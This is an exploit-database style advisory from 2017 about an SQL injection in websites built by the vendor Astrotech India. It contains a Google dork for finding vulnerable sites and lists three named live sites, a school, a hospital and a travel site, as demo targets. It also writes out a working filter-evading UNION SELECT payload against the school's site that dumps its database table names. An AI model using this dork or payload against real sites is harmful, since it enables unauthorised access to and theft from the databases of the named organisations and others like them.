# Exploit Title: Astrotech India - SQL Injection Vulnerability
# Google Dork: intext:"Developed By : Astrotech India" newsid=
# Date: 2017-06-21
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: -
# Tested on: Kali Linux
# Vendor Homepage: www.astrotechindia.com
# CVE : -
--------------------------------------
Demo:
http://www.orchidpublicschool.edu.in/newsdetails.php?NewsId=1[SQLi]
http://www.kunalhospital.com/newsdetails.php?NewsId=1[SQLi]
http://www.travelingfuns.com/newsdetail?NewsId=176[SQLi]
Live Demo Injected:
http://www.orchidpublicschool.edu.in/newsdetails.php?NewsId=-1%27+/*!50000UnION*/+SELECT+1,/*!50000Group_ConCat(table_name)*/,3,4,5,6+From+/*!50000InFormation_schema*/.tables+where+table_schema=database()--+
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com
# Sh4dow - Cyrus - SOLTAN SILENT - AminStev